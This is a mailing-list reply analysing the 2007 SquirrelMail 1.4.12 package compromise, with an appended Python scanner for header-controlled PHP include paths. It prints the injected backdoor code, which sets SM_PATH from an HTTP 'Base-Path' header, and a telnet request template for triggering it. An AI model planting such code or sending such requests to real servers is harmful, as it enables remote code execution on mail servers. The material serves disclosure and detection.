From: Uwe Schindler <thetaphi <at> php.net>
Subject: Re: SECURITY: 1.4.12 Package Compromise
Newsgroups: gmane.mail.squirrelmail.devel
Date: Friday 14th December 2007 16:55:28 UTC
Hello Jon,

I found your announcement in a news ticker (heise online) today.

> Further investigations show that the modifications to the code should
> have little to no impact at this time.  Modifications seemed to be
> based around a PHP global variable which we cannot track down.  The
> changes made will most likely generate an error, rather than a
> compromise of a system in the event the code does get executed.

Diffing the compromised source against the original source, I found that the
following code had been added to the source tarball:

/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
    define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}

This is really an important security issue! At first glance you will think
there is no standard variable named "HTTP_BASE_PATH", so no problem! That's
true, but you should know how HTTP_XXX variables are generated by web servers.

These variables come from the original CGI specs
(http://hoohoo.ncsa.uiuc.edu/cgi/env.html):
"In addition to these,
the header lines received from the client, if any, are placed into
the environment with the prefix HTTP_ followed by the header name.
Any - characters in the header name are changed to _ characters. The
server may exclude any headers which it has already processed, such
as Authorization, Content-type, and Content-length. If necessary, the
server may choose to exclude any or all of these headers if including
them would exceed any system environment limits."

Apache and other web servers mostly do not run PHP as CGI, but PHP works
according to the CGI specs. This is where variables like HTTP_USER_AGENT,
HTTP_HOST or HTTP_COOKIE come from. They are not explicitly generated by the
web server; they are sent by the client as HTTP headers and transformed into
environment variables in the way the CGI spec specifies (in PHP they are
copied to $_SERVER).

This means you can change the constant "SM_PATH" by issuing an HTTP request,
e.g. with telnet:

> telnet www.example.org 80
GET / HTTP/1.1
Connection: close
User-Agent: test/1.0
Base-Path: ************************

Where *********** could, for example, be a remote URL, which leads to remote
code execution. So this is a very serious security flaw, very well disguised!
It seems that you can modify an internal constant of Squirrel that is
important and used in all includes:

e.g.:
require_once(SM_PATH . 'config/config.php');

P.S.: You can test this with a simple phpinfo() page, requesting it with
telnet/netcat with custom headers, as I did.

-----
Uwe Schindler
[email protected] - http://www.php.net
NSAPI SAPI developer
Bremen, Germany
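As an added example (not part of Uwe's mail or of SquirrelMail's code), the following Python script does two things a reviewer of that tarball would want: it applies the CGI header-to-variable rule quoted above to a constructed request, showing that a "Base-Path" header lands in $_SERVER as HTTP_BASE_PATH while Content-Length is dropped, and it scans PHP source for the pattern found in the diff, a define() or include path fed from $_SERVER['HTTP_...']. It also flags the indirect case, an include built from a constant that was itself defined from a header. The header list, the PHP sample and the HTTP_X_TEMPLATE line are constructed for the demonstration; the Base-Path value is a placeholder.

```python
import re

SERVER_PROCESSED = {"authorization", "content-type", "content-length"}  # server may omit these (CGI spec)

def cgi_env_name(header_name):
    """CGI rule quoted in the mail: prefix HTTP_, upper-case, '-' becomes '_' (PHP copies it to $_SERVER)."""
    return "HTTP_" + header_name.strip().upper().replace("-", "_")

def headers_to_cgi_env(headers):
    """HTTP_* variables a CGI-style server derives from (name, value) request headers."""
    return {cgi_env_name(n): v for n, v in headers if n.lower() not in SERVER_PROCESSED}
# define('NAME', $_SERVER['HTTP_...']): a constant any client can set by sending a header
TAINTED_DEFINE = re.compile(r"""define\s*\(\s*['"](\w+)['"]\s*,\s*\$_SERVER\s*\[\s*['"](HTTP_\w+)['"]\s*\]""")
INCLUDE_STMT = re.compile(r"""\b(?:include|require)(?:_once)?\b[^;]*""")
HEADER_VAR = re.compile(r"""\$_SERVER\s*\[\s*['"](HTTP_\w+)['"]""")
def find_header_controlled_paths(php_source):
    """Findings (line, kind, constant_or_None, HTTP_ variable) for header-fed defines and includes."""
    lines = php_source.splitlines()
    findings, tainted = [], {}  # tainted: constant name -> HTTP_ variable it comes from
    for n, line in enumerate(lines, 1):  # pass 1: client-controlled constants
        m = TAINTED_DEFINE.search(line)
        if m:
            tainted[m.group(1)] = m.group(2)
            findings.append((n, "define", m.group(1), m.group(2)))
    for n, line in enumerate(lines, 1):  # pass 2: includes built from them (or from a header directly)
        stmt = INCLUDE_STMT.search(line)
        if not stmt:
            continue
        h = HEADER_VAR.search(stmt.group(0))
        if h:
            findings.append((n, "include", None, h.group(1)))
        for const, var in tainted.items():
            if re.search(r"\b%s\b" % re.escape(const), stmt.group(0)):
                findings.append((n, "include", const, var))
    return sorted(findings, key=lambda f: f[0])
# Constructed request modelled on the telnet session in the mail (Base-Path value is a placeholder)
SAMPLE_HEADERS = [("Host", "www.example.org"), ("Connection", "close"), ("User-Agent", "test/1.0"),
                  ("Content-Length", "0"), ("Base-Path", "http://placeholder.invalid/")]
# Constructed PHP file: the tarball snippet plus a benign header read and a direct-include variant
SAMPLE_PHP = """<?php
/** set the value of the base path */
if (isset($_SERVER['HTTP_BASE_PATH'])) {
    define('SM_PATH',$_SERVER['HTTP_BASE_PATH']);
}
$ua = $_SERVER['HTTP_USER_AGENT'];  // reading a header is not a finding by itself
require_once(SM_PATH . 'config/config.php');
include($_SERVER['HTTP_X_TEMPLATE'] . '.php');  // constructed direct form
"""
```

Running find_header_controlled_paths over a real tarball (one file at a time) reports the injected define on line 4 of the sample and the require_once that consumes SM_PATH, while the plain read of HTTP_USER_AGENT is not reported.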



-----
squirrelmail-devel mailing list
Posting guidelines: http://squirrelmail.org/postingguidelines
List address: [email protected]
List archives: http://news.gmane.org/gmane.mail.squirrelmail.devel
List info (subscribe/unsubscribe/change options): https://lists.sourceforge.net/lists/listinfo/squirrelmail-devel